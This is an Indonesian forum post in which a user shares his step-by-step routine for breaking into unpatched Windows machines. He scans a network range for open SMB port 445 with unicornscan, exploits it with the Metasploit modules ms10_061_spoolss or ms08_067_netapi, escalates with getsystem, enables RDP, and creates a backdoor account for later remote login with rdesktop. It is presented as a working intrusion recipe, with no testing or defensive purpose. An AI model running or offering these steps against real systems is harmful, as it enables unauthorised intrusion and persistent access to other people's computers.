1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

cuma ingin berbagi kali aja...

Discussion in 'Indonesian' started by amatuharten, Jul 10, 2014.

1. amatuharten

amatuharten New Member

Seperti yg kita ketahui bersama, metasploit uda g bs dipungkiri lg sbgai tools untuk hacking.. apalagi untuk window$ dgn versi dibawah window$ 7..
    beberapa tahap yg biasa ane lakuin:
    1. scanning jaringan.. ane biasa pake
    unicornscan -i XX -Ir 80 -E XXX.XXX.XXX.XXX/17:445 | grep --color open
    unicornscan ni menurut ane cepet bgt responnya.. knp 445, ya krn versi window$ dibawah 7 tu rentan bgt di service SMB nya yg lagi open..

2. di metasploit / ato pake armitage :
    pilih module ms10_061_spoolss .. klo biasanya sih bnyk yg langsung pake module ms08_067_ netapi ..alasan ane g pake ms08 netapi kadang g langsung bs mengeksploitasi.. malah bisa2 sono nya langsung otomatis reject kita pas kita mau konek.. nah klo ms10_061 powerfull bgt.. kita tinggal masukin nama printer yg target sharingkan ke network dan ip address nya.. trz alesan lainnya ada beberapa target window$ 7 bisa dieksploitasi dgn modul ini (yg males update window$nya)

3. nah klo misal ms10 ini gak ngefek apa2,, baru ke ms08 netapi.. tp sayang, module ini cm smpe xp aja.. tp spools bisa mpe window$ 8 tinggal dioprek modulnya.. nah klo misal agan2 uda ada yg pnya oprekannya (bnyak waktu ngoprek modul ms10 spoolss buat window$ 8 dan juga pnya bnyk leptop buat percobaan), mohon di share ya gan!

4. setelah sukses ekploitasi, di meterpreter ane langsung ketik getsystem, setelah itu run getgui -e (ini untuk enabling rdp), setelah itu run getgui -u usernameterserahagan -p passwordterserahagan ,,,,, nah itu gunanya ntar laen kali kita bisa sewaktu -waktu ngeremot target.. ntar laen kali dari console shell linux kita tinggal ketik
    rdesktop -u usernameterserahagan -p passwordterserahagan IPAddressTarget

Share This Page